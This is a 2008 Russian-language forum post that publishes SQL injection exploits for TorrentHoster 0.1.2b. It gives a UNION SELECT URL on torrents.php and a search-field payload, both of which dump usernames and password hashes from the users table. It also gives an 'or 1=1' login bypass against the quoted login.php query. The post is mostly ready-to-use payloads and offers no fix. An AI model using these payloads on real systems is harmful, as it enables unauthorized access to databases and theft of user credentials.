TorrentHoster <= 0.1.2b SQL Injection

Discussion in 'Веб-уязвимости' started by ~!DoK_tOR!~, 6 Sep 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    TorrentHoster <= 0.1.2b SQL Injection

    Dwonload TorrentHoster0.1.2b

    [1]

    файл torrents.php

    Условие: magic_quotes_gpc = Off

    Exploit:

    Code:
    http://localhost/[COLOR=DarkOrange][installdir][/COLOR]/torrents.php?mode=details&id=-1'+union+select+1,2,3,4,concat_ws(0x3a,userName,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
    Описание:

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.Уязвимость существует из-за недостаточной обработки входных данных в параметре $id в сценарии torrents.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    в поле Search Torrents вводим:

    Code:
    dok' union select 1,user(),3,version(),5,6,7,concat_ws(0x3a,userName,password),9,10,11,12,13,14,15,16 from users/*
    [2]

    Обход авторизации

    файл login.php

    Vuln code:

    PHP:
    $qid db_query("
        SELECT userName, password, privilege, email
        FROM users
        WHERE userName = '
    $username' AND password = '" md5($password) . "'
        "
    );
    Условие: magic_quotes_gpc = Off

    Username: 1' or 1=1/*
    Password: 1' or 1=1/*

    (c) ~!Dok_tOR!~
     
    #1 ~!DoK_tOR!~, 6 Sep 2008
    Last edited: 6 Sep 2008
    2 people like this.